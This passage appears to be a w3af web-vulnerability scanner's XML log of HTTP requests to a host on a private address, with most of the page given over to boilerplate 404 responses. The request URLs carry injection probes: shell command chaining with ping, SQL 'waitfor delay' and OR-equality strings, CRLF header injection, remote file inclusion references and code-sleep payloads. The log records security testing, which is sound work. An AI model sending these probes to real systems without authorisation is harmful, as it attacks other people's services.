                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="484">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/Thread.sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="492">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="529">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%22 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="531">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/iDontExist HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="535">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="538">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/w3af%0D%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="541">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/w3af%0Dvulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="543">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/w3af%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="547">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="548">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/http%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="549">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/http%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="550">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/w3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="551">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/hTtP%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="555">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/hTtP%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="563">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/Thread.Sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.Sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="570">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%26%26ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="624">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="667">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%26%26ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="721">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="761">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/79%22+OR+%2279%22%3D%2279 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
